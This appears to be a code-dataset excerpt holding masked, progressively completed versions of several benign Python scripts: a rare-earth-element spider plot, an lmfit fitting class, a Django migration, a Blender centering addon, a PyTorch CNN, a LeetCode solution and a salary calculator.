'/users/gennachiaro/Documents/Vanderbilt/Research/Ora Caldera/Trace Elements/Rare Earth Elements/REE_Mean_Normalized.csv'
, index_col=0)
MG = df.loc[['ORA-2A-001', 'ORA-2A-005', 'ORA-2A-018', 'ORA-2A-031',
'ORA-2A-032', 'ORA-2A-035', 'ORA-2A-040']]
VCCR = df.loc[['ORA-5B-402', 'ORA-5B-404A', 'ORA-5B-404B', 'ORA-5B-405',
'ORA-5B-406', 'ORA-5B-407', 'ORA-5B-408-SITE2', 'ORA-5B-408-SITE7',
'ORA-5B-408-SITE8', 'ORA-5B-409', 'ORA-5B-411', 'ORA-5B-412A-CG',
'ORA-5B-412B-CG', 'ORA-5B-413', 'ORA-5B-414-CG', 'ORA-5B-415',
'ORA-5B-416', 'ORA-5B-417']]
FG = df.loc[['ORA-5B-410', 'ORA-5B-412A-FG', 'ORA-5B-412B-FG', 'ORA-5B-414-FG']
]
FGCP = df.loc[['ORA-2A-002_Type1', 'ORA-2A-002_Type2', 'ORA-2A-002',
'ORA-2A-003', 'ORA-2A-016_Type1', 'ORA-2A-016-Type2',
'ORA-2A-016-Type3', 'ORA-2A-016-Type4', 'ORA-2A-023', 'ORA-2A-024',
'MINGLED1-ORA-2A-024', 'MINGLED2-ORA-2A-024', 'MINGLED3-ORA-2A-024']]
MG.pyroplot.spider(color='green', alpha=0.5, mode='fill')
VCCR.pyroplot.spider(color='red', alpha=0.5, mode='fill')
FG.pyroplot.spider(color='purple', alpha=0.5, mode='fill')
FGCP.pyroplot.spider(color='blue', alpha=0.5, mode='fill')
sns.set_style('darkgrid')
plt.show()
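# (editor's note, assumption) the CSV appears to hold already-normalized mean
# REE values, so pyroplot.spider plots them directly; mode='fill' shades the
# envelope spanned by each sample group instead of drawing one line per sample.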
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 18 13:36:13 2019
@author: gennachiaro
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
import pyrolite.plot
from pyrolite.plot.spider import spider
#read in data
df = pd.read_csv('/users/gennachiaro/Documents/Vanderbilt/Research/Ora Caldera/Trace Elements/Rare Earth Elements/REE_Mean_Normalized.csv', index_col=0)
#set values
MG = df.loc[['ORA-2A-001','ORA-2A-005','ORA-2A-018','ORA-2A-031','ORA-2A-032','ORA-2A-035','ORA-2A-040']]
VCCR = df.loc [['ORA-5B-402','ORA-5B-404A','ORA-5B-404B','ORA-5B-405','ORA-5B-406','ORA-5B-407','ORA-5B-408-SITE2','ORA-5B-408-SITE7','ORA-5B-408-SITE8','ORA-5B-409','ORA-5B-411','ORA-5B-412A-CG','ORA-5B-412B-CG','ORA-5B-413','ORA-5B-414-CG','ORA-5B-415','ORA-5B-416','ORA-5B-417']]
FG = df.loc [['ORA-5B-410','ORA-5B-412A-FG','ORA-5B-412B-FG','ORA-5B-414-FG']]
FGCP = df.loc[['ORA-2A-002_Type1','ORA-2A-002_Type2','ORA-2A-002','ORA-2A-003','ORA-2A-016_Type1','ORA-2A-016-Type2','ORA-2A-016-Type3','ORA-2A-016-Type4','ORA-2A-023','ORA-2A-024','MINGLED1-ORA-2A-024','MINGLED2-ORA-2A-024','MINGLED3-ORA-2A-024']]
#plot diagrams
MG.pyroplot.spider(color="green",alpha = 0.5, mode = "fill")
VCCR.pyroplot.spider(color="red",alpha = 0.5, mode = "fill")
FG.pyroplot.spider(color="purple",alpha = 0.5, mode = "fill")
FGCP.pyroplot.spider(color="blue",alpha = 0.5, mode = "fill")
#set background
sns.set_style("darkgrid")
#plot graph
plt.show() | [
0,
1,
2,
3,
4
] |
1,651 | 9e16921d83a5f62aad694b26a92b57b97ccda461 | <mask token>
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
<mask token>
def get_opt_parameters(self):
if self.fit_result is None:
            raise ValueError('No fit result! Do a fit before asking for parameters.')
return self.fit_result.params.valuesdict()
<mask token>
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| <mask token>
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
<mask token>
def get_opt_parameters(self):
if self.fit_result is None:
            raise ValueError('No fit result! Do a fit before asking for parameters.')
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| <mask token>
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
def do_minimisation(self, x, data, weights=1, **kwargs):
self.fit_result = minimize(self.residuals_wrapper, self.parameters,
args=(x, data, weights), kws=kwargs)
logging.info('Fit Result')
logging.info('==========')
return self.fit_result
def get_opt_parameters(self):
if self.fit_result is None:
            raise ValueError('No fit result! Do a fit before asking for parameters.')
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| <mask token>
import numpy as np
import matplotlib.pyplot as plt
from lmfit import minimize, Parameters, fit_report
import logging
class FitTemplate:
def __init__(self, fit_function, log_dir=None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
if log_dir is not None:
logging.basicConfig(filename=log_dir + 'log.log', level=logging
.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data, weights, **kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data) * weights) ** 2
def do_minimisation(self, x, data, weights=1, **kwargs):
self.fit_result = minimize(self.residuals_wrapper, self.parameters,
args=(x, data, weights), kws=kwargs)
logging.info('Fit Result')
logging.info('==========')
return self.fit_result
def get_opt_parameters(self):
if self.fit_result is None:
            raise ValueError('No fit result! Do a fit before asking for parameters.')
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info(fit_report(self.fit_result))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel=None, ylabel=None, title=None,
errorbars=None, label=None, ax=None, c=None, colour_index=None, **
kwargs):
if ax is None:
_, ax = plt.subplots(1, 1, constrained_layout=True, figsize=(18, 9)
)
plt.rcParams.update({'font.size': 16})
colours = ['b', 'm', 'c', 'r', 'tab:orange', 'tab:pink']
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
ax.scatter(x, y, color=color)
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls='none', c=color, capsize=3)
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.
params.valuesdict(), **kwargs), c=color, label=label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
| """After seeing how great the lmfit package, I was inspired to create my own
object using it. This acts as a fitting template.
"""
##-------------------------------PREAMBLE-----------------------------------##
import numpy as np
import matplotlib.pyplot as plt
from lmfit import minimize, Parameters, fit_report
import logging
##-------------------------------CLASS DEFINITION-----------------------------------##
class FitTemplate():
def __init__(self, fit_function, log_dir = None):
self.fit_function = fit_function
self.parameters = Parameters()
self.fit_result = None
#setup logging. warning level is standard and is sent to stdout. info is requested by log_dir argument,
#and is printed to log file
if log_dir is not None:
logging.basicConfig(filename=log_dir +'log.log', level=logging.INFO)
else:
logging.basicConfig(level=logging.CRITICAL)
def residuals_wrapper(self, parameters, x, data,weights,**kwargs):
model_values = self.fit_function(x, parameters.valuesdict(), **kwargs)
return ((model_values - data)*weights)**2
def do_minimisation(self, x, data, weights = 1, **kwargs):
self.fit_result = minimize(self.residuals_wrapper, self.parameters, args = (x, data, weights), kws = kwargs)
logging.info('Fit Result')
logging.info('==========')
return self.fit_result
def get_opt_parameters(self):
if self.fit_result is None:
raise ValueError("No fit result! Do a fit before asking for")
return self.fit_result.params.valuesdict()
def print_parameters(self):
self.parameters.pretty_print()
def print_fit_result(self):
logging.info((fit_report(self.fit_result)))
print(fit_report(self.fit_result))
def plot_fit(self, x, y, xlabel = None, ylabel = None, title = None, errorbars = None, label = None, ax = None, c = None, colour_index = None, **kwargs):
if ax is None:
_, ax = plt.subplots(1 ,1, constrained_layout=True, figsize=(18, 9))
plt.rcParams.update({'font.size': 16})
colours = ['b','m','c','r','tab:orange', 'tab:pink']
#decide colour
if c is not None:
color = c
elif colour_index is not None:
color = colours[colour_index]
else:
color = colours[0]
#scatter plot
ax.scatter(x, y, color = color)
#plot errors
if errorbars is not None:
ax.errorbar(x, y, errorbars, ls = 'none', c = color, capsize = 3)
#plot model
fitdomain = np.linspace(x[0], x[-1], 1000)
ax.plot(fitdomain, self.fit_function(fitdomain, self.fit_result.params.valuesdict(), **kwargs), c = color, label = label)
plt.legend()
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.set_xlabel(xlabel)
plt.grid()
return ax
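# (editor's usage sketch; the linear model, data, and parameter names below are
# invented for illustration. Also note: lmfit's minimize() itself sums the
# squares of the returned residual array, so returning ((model - data)*weights)**2
# effectively minimizes a fourth power; returning the weighted residuals
# directly is the more usual choice.)
if __name__ == '__main__':
    xs = np.linspace(0.0, 10.0, 50)
    ys = 2.0 * xs + 1.0 + np.random.normal(0.0, 0.1, xs.size)
    fitter = FitTemplate(lambda x, p: p['a'] * x + p['b'])
    fitter.parameters.add('a', value=1.0)
    fitter.parameters.add('b', value=0.0)
    fitter.do_minimisation(xs, ys)
    fitter.print_fit_result()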
| [
6,
7,
8,
9,
10
] |
1,652 | 0cba18ca7126dda548a09f34dc26b83d6471bf68 | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('courses', '0015_auto_20151216_1136')]
operations = [migrations.AlterField(model_name='duration', name=
'duration', field=models.DecimalField(default=60, verbose_name=
'duration', max_digits=10, decimal_places=0))]
| from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('courses', '0015_auto_20151216_1136')]
operations = [migrations.AlterField(model_name='duration', name=
'duration', field=models.DecimalField(default=60, verbose_name=
'duration', max_digits=10, decimal_places=0))]
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0015_auto_20151216_1136'),
]
operations = [
migrations.AlterField(
model_name='duration',
name='duration',
field=models.DecimalField(default=60, verbose_name='duration', max_digits=10, decimal_places=0),
),
]
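    # (editor's note, assumption) decimal_places=0 stores the duration as a
    # whole number; the default of 60 suggests the unit is minutes.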
| [
0,
1,
2,
3,
4
] |
1,653 | a28c62a18d793fb285353902d01801c720bcb454 | # this app is open
# Let's start with an introduction
print "Hi, I am x0x. Could we introduce ourselves? (yes/no)"
answer = raw_input()
if answer.lower() == 'yes':
print "Okay, what is your name?"
name = raw_input()
print "Hi", name
print "Nice to meet you."
print "What are you going to do?"
print '1. Say "good bye"'
print '2. Say "Thank you"'
answer = raw_input()
if answer == '1':
print 'Well, good bye', name
elif answer == '2':
print 'Sakalangkong', name
else:
        print 'You chose the wrong answer, I am terminating.'
print 'bye'
elif answer.lower() == 'no':
print "thank you"
else:
print "your answer is wrong"
print "Please come back later. Thank you!"
print "yoyoi oke"
| null | null | null | null | [
0
] |
1,654 | f7a511beaea869cf32eb905a4f3685077297a5ec | <mask token>
class CenterOriginToZero(bpy.types.Operator):
<mask token>
<mask token>
<mask token>
<mask token>
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
<mask token>
| <mask token>
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script"""
bl_idname = 'object.center_all_in_level'
bl_label = 'Center Origin (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
<mask token>
| <mask token>
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script"""
bl_idname = 'object.center_all_in_level'
bl_label = 'Center Origin (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
if __name__ == '__main__':
register()
| <mask token>
bl_info = {'name': 'Ratchets Center All Objects', 'author': 'Ratchet3789',
'version': (0, 1, 0), 'description':
'Centers all selected objects. Built for Game Development.', 'category':
'Object'}
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script"""
bl_idname = 'object.center_all_in_level'
bl_label = 'Center Origin (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
if __name__ == '__main__':
register()
| import bpy
bl_info = {
"name": "Ratchets Center All Objects",
"author": "Ratchet3789",
"version": (0, 1, 0),
"description": "Centers all selected objects. Built for Game Development.",
"category": "Object",
}
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "object.center_all_in_level" # unique identifier for buttons and menu items to reference.
bl_label = "Center Origin (Zero)" # display name in the interface.
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
# execute() is called by blender when running the operator.
def execute(self, context):
# The original script
for x in bpy.context.selected_objects:
x.location = (0, 0, 0)
# this lets blender know the operator finished successfully.
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = "object.snap_to_origin"
bl_label = "Center Mesh (Zero)"
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = "object.absolute_center_all_in_level"
bl_label = "Center All (Zero)"
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
x.location = (0, 0, 0)
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
# This allows you to run the script directly from Blender's text editor
# to test the addon without having to install it.
if __name__ == "__main__":
register()
| [10, 14, 15, 16, 18] |
1,655 | ad63beedc460b3d64a51d0b1f81f8e44cb559749 | <mask token>
class NET(nn.Module):
<mask token>
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| <mask token>
class NET(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 64, 5)
self.conv2 = nn.Conv2d(64, 128, 5)
self.conv3 = nn.Conv2d(128, 64, 5)
x = torch.randn(86, 86).view(-1, 1, 86, 86)
self.boyut = None
self.uzunluk(x)
self.fkl1 = nn.Linear(self.boyut, 512)
self.fkl2 = nn.Linear(512, 3)
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| <mask token>
device = torch.device(0)
class NET(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 64, 5)
self.conv2 = nn.Conv2d(64, 128, 5)
self.conv3 = nn.Conv2d(128, 64, 5)
x = torch.randn(86, 86).view(-1, 1, 86, 86)
self.boyut = None
self.uzunluk(x)
self.fkl1 = nn.Linear(self.boyut, 512)
self.fkl2 = nn.Linear(512, 3)
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| import torch, cv2, os, time
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
device = torch.device(0)
class NET(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 64, 5)
self.conv2 = nn.Conv2d(64, 128, 5)
self.conv3 = nn.Conv2d(128, 64, 5)
x = torch.randn(86, 86).view(-1, 1, 86, 86)
self.boyut = None
self.uzunluk(x)
self.fkl1 = nn.Linear(self.boyut, 512)
self.fkl2 = nn.Linear(512, 3)
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| import torch,cv2,os,time
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# GPU usage
device=torch.device(0)
class NET(nn.Module):
def __init__(self):
super(). __init__()
self.conv1=nn.Conv2d(1,64,5)
self.conv2=nn.Conv2d(64,128,5)
self.conv3=nn.Conv2d(128,64,5)
x=torch.randn(86,86).view(-1,1,86,86)
self.boyut=None
self.uzunluk(x)
self.fkl1=nn.Linear(self.boyut,512)
self.fkl2=nn.Linear(512,3)
def uzunluk(self,x):
x=F.max_pool2d(F.relu(self.conv1(x)),(2,2))
x=F.max_pool2d(F.relu(self.conv2(x)),(2,2))
x=F.max_pool2d(F.relu(self.conv3(x)),(2,2))
if self.boyut is None:
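            # cache the flattened feature size (channels * height * width) on the first forward pass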
self.boyut=x[0].shape[0]*x[0].shape[1]*x[0].shape[2]
return x
def forward(self,x):
x=self.uzunluk(x)
x=x.view(-1,self.boyut)
x=F.relu(self.fkl1(x))
x=F.softmax(self.fkl2(x))
return x
| [3, 4, 5, 6, 7] |
1,656 | 0212382b5c8cc1e98142a784fd26efd577ebceaf | <mask token>
| <mask token>
class Solution:
<mask token>
| <mask token>
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:
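        # corner coordinates are doubled (x2) so half-integer boundaries stay integral before compression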
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])
for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
| from typing import List
from 二维差分模板 import DiffMatrix
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])
for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
| # LCP 74. Strongest Blessing Force Field - coordinate compression + 2D difference array
# https://leetcode.cn/problems/xepqZ5/
# forceField[i] = [x, y, side]: the i-th force field covers the square centred at (x, y) with side length side.
# !The field strength of a point equals the number of force fields covering it; return the maximum field strength in the area.
# !Collect all bottom-left and top-right corners; since coordinates like 0.5 can appear, multiply every coordinate by 2.
# O(n^2)
from typing import List
from 二维差分模板 import DiffMatrix
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) -> int:
        # coordinate compression
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
        # 2D difference array
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([[0] * col for _ in range(row)])
for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
| [0, 1, 2, 3, 4] |
1,657 | ffcd3c0086ff73eb722d867b335df23382615d20 | <mask token>
| <mask token>
print(
    'An employee who earned R$ {:.2f} will earn R$ {:.2f} after a 15% raise'
    .format(salario, novo))
| salario = float(input('What is your current salary? R$ '))
novo = salario + salario * 15 / 100
print(
